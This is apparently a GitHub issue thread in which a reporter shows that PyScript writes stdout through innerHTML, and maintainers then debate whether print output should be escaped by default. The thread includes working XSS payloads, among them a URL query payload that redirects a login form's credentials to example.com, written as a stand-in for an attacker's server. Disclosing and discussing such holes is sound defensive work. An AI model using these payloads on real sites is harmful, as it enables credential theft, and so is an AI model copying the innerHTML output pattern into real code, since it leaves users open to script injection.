Printing is susceptible to cross-site scripting vulnerabilities by default

[rayjolt]

Describe the bug
PyScript writes stdout from Python to a div element using its innerHTML property. From base.ts:

    addToOutput(s: string) {
        this.outputElement.innerHTML += '<div>' + s + '</div>';
        this.outputElement.hidden = false;
    }

This method of writing stdout is prone to cross-site scripting (XSS) vulnerabilities. Rather than writing using innerHTML, the default should be to use a safe output method, such as appending a text node to the output element, or outputting to the console log.

To Reproduce
You can get PyScript to run arbitrary JavaScript when printing to stdout by using an XSS payload such as this:

<img src="x" onerror="alert('XSS')" />

When the browser encounters this, it tries to load the image from the source x, but since there is no image there, it then runs the code in the onerror attribute. This pops up an alert dialog with the content "XSS".

This is shown with the following HTML:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JavaScript execution from Python stdout</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
</head>
<body>
    Example of JavaScript execution from Python stdout:
    <py-script>
payload = "<"
payload += """img src="x" onerror="alert('XSS')"/>"""
print(payload)
    </py-script>
</body>
</html>

(Note: here I am splitting up the payload before printing it, as if you try to print it all at once it will get executed when the page first loads, before the browser processes the <py-script></py-script> tags.)

To demonstrate why this is a security problem, consider the following example, where PyScript greets the user based on the name query parameter in the URL. The example also contains a sample login form where the user inputs their username and password in order to post comments. The login form sends the username and password /login.php, which would handle the login logic. (The login logic itself is omitted for the sake of simplicity.)

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Dynamic PyScript greeting</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    <style>
        h1 {
            font-size: 30px;
        }

        h2 {
            font-size: 20px;
        }

        form {
            border: 3px solid #f1f1f1;
            max-width: 500px;
            padding: 16px;
            margin: 12px;
        }

        input {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: #04AA6D;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            width: 100%;
        }
    </style>
</head>
<body>
    <!-- Greet the user specified in the "name" query parameter -->
    <h1>Dynamic PyScript greeting</h1>
    <py-script>
from js import location
from urllib.parse import urlparse, parse_qs

query = urlparse(str(location)).query
try:
    name = parse_qs(query)["name"][0]
except (KeyError, IndexError):
    name = "PyScript"
print(f"Hello, {name}!")
    </py-script>

    <!-- Login form for comment functionality -->
    <form id="login-form" action="/login.php" method="post">
        <h2>Log in to post comments:</h2>
        <label for="username">Username</label>
        <input type="text" placeholder="Enter Username" name="username" required>

        <label for="password">Password</label>
        <input type="password" placeholder="Enter Password" name="password" required>
            
        <button type="submit">Login</button>
    </form>
</body>
</html>

With no name parameter, the script shows the message "Hello, PyScript!".

When we provide the query string ?name=Test, the script shows the message "Hello, Test!"

However, as the output of the Python print function is being written to the output div using the innerHTML property, it is possible to inject HTML and JavaScript using the name query parameter. There are many nefarious things an attacker could use this for, but as an example, here is a payload that changes the login form to send the user's username and password to https://example.com instead of to /login.php.

?name=XSS%3Cimg%20src=%22x%22%20onerror=%22document.getElementById('login-form').action%3D'https://example.com'%22/%3E

After URL decoding, this is what gets printed by PyScript:

XSS<img src="x" onerror="document.getElementById('login-form').action='https://example.com'"/>

Opening the page with this query string gives the following output:

If you look at the developer tools, you can see that clicking on the Login button actually does send the user's username and password to https://example.com.

One way of exploiting this would be for an attacker to send a link containing the malicious payload above to the victim, perhaps through an email. When doing so, the attacker would not use example.com, but instead they would use a domain that they control. The victim then clicks the link and tries to log in to post a comment. When the victim clicks the Login button, their username and password are sent to the attacker's server. The attacker can inspect the server logs to find the victim's username and password, and then take over the victim's account.

Mitigation

When users implement PyScript scripts, they can mitigate this issue by HTML-encoding everything written to stdout. This can be done with html.escape, like this:

import html

print(html.escape("""<img src="x" onerror="alert('This will not be executed')" />"""))

However, this relies on a) users knowing that they should do this, b) users escaping all of their output correctly, and c) third-party libraries also escaping output written to stdout. This is unlikely to happen, especially when users are less familiar with security issues.

Instead, it would be much better for PyScript to have secure defaults when writing output. This could be done by wrapping the stdout value in a text node using Document.createTextNode before appending it to the DOM, or by logging stdout to the console with console.log instead of writing it to the DOM.

[rayjolt]

Note: this is an issue with insecure defaults, but it is not a vulnerability by itself, so I decided to report it here instead of emailing security@pyscript.net. Fixing it will also require fundamental changes in the way printing works, so the community will likely want to comment on how it should be fixed.

This is a different issue from the one I was talking about in #206, although they are related.

[verhulstm]

i dont see how this is a security issue

pyscript is a general tool, you can have it do what you want. you can write code to send data to https://example.com or /login.php or anywhere else. its up to you

[verhulstm]

you can access a hosted pyscript app and see what it does. then you can download and modify the app to do anything.

but that is your copy of the app. i dont see how what you have above effects others. generally speaking. a bad actor would have to attack a hosting server and change the official app code into bad code. but this is normal it's the same for all other public hosted systems and code

[rayjolt]

generally speaking. a bad actor would have to attack a hosting server and change the official app code into bad code.

This is not necessary if the following conditions are present:

1. The app accepts some kind of user input. This could be from the URL (as in my example), from an API, or in some other way.
2. The app does not sanitise this user input.
3. The app writes the user input to stdout, using the print function or via another method.

If these conditions are present, an attacker can send input containing JavaScript code, and get the victim's browser to run it. (This is called cross-site scripting.)

This can be mitigated by the app author by sanitising any user input, but it would be more effective to do the sanitisation on the PyScript side. Leaving it to app authors to escape their user input is risky; it would be better for apps to be secure by default.

[verhulstm]

I understand the details of what you found.

i don't consider this a security issue the we should fix.

we designed it so that devs can print any html to the dom. we want devs and users to be able to construct full template HTML and inject it into the dom. we designed pyscript to not print output to the console instead we choose to print to the dom.

i think you found a "best practice", that is - we should explain in the docs that we don't recommend devs print user supplied data.

what you found is one of many complexities of running cpython in the browser, and we will find many more. but changing the expected way a basic python pattern like "print" works is not the kinda thing i think we should do.

"print" needs to print whatever you pass it

maybe we can add a optional "secure print"'

[rayjolt]

we designed it so that devs can print any html to the dom. we want devs and users to be able to construct full template HTML and inject it into the dom.

I agree that this should be possible. There are many use cases for dynamically adding HTML to pages, and PyScript should allow for these. However, doing this by default is insecure, for the reasons I outlined above. A more secure approach would be to sanitise input automatically before printing it, and to only allow app authors to append raw HTML to the DOM if they explicitly choose to.

we designed pyscript to not print output to the console instead we choose to print to the dom.

PyScript does not have to write stdout to the console in order to be secure. It would also be fine to wrap output in text nodes before appending them to the DOM. This would prevent any JavaScript contained in the output from being run, while still displaying the output to the user.

changing the expected way a basic python pattern like "print" works is not the kinda thing i think we should do.

I don't think we can easily equate Python printing to stdout on servers with PyScript appending output to the DOM in browsers. The two are completely different paradigms. The closest analogue to the latter is probably Django templates or Jinja2 templates. Both of these escape their input automatically, and only allow you to input unescaped HTML if you specifically allow them to. In other words, they are secure by default.

[verhulstm]

we have been talking about how best to create html for use cases where pyscript is used "kinda like a frontend framework".

one good way is to use django templates or jinja2 templates kinda like you mention. then print their rendered text to the dom

[verhulstm]

we dont generally want tp prevent any JavaScript contained in the output from being run. if a dev wants to print text to the dom that has js that should be supported

[verhulstm]

maybe we should add in some nice tools to help with input sanitation. but that is not done in the print function. and these tools would be up to the dev to know how to use. so more best practice document :)

[rayjolt]

maybe we should add in some nice tools to help with input sanitation.

Python already contains html.escape, which can be used for this purpose.

>>> import html
>>> html.escape('<img src="x" onerror="alert(1)" />')
'&lt;img src=&quot;x&quot; onerror=&quot;alert(1)&quot; /&gt;'

But how many beginner developers are going to know to use this? Even if you add a warning to the documentation, how many developers will read that far? Allowing arbitrary JavaScript execution by default is a recipe for trouble.

[fimion]

My suggestion here would be to print using text nodes by default, and have an alternative print (printDangerously ala React's dangerouslySetInnerHTML) that would allow printing html elements.

[philippjfr]

There are also other reasons to escape print output by default. Specifically a lot of strings will contain special characters, e.g. printing types is a common case and the output of print(type(1)) will output <class 'int'> which currently gets interpreted as an HTML tag and won't show up at all. The security concern and this issue makes me lean toward escaping print by default. (Related issue here: #182)

[rayjolt]

To be clear, it is not just print() that needs to be escaped, but any output that is written to stdout or stderr. For example, this pops up an alert dialog:

<py-script>
import sys
sys.stdout.write('<' + 'img src="x" onerror="alert(1)" />')
</py-script>

As does this:

<py-script>
'<' + 'img src="x" onerror="alert(1)" />'
</py-script>

And this:

<py-script>
import sys
sys.stderr.write('<' + 'img src="x" onerror="alert(1)" />')
</py-script>

[siddhi]

maybe we should add in some nice tools to help with input sanitation. but that is not done in the print function. and these tools would be up to the dev to know how to use. so more best practice document :)

Considering pyscript will be used a lot by beginners, I think printing should be escaped by default. When someone prints something, they expect to see that thing on the screen. That's the way it works on the terminal. Nothing more confusing than doing print("you entered <hi>") and then seeing a strange output on the screen. Now if we tell them that it has to be escaped etc etc it is too complicated.

As many have suggested have another function to do raw printing that more advanced users can use to render html on the screen, and if a developer chooses to use that, then sanitising inputs is their responsibility.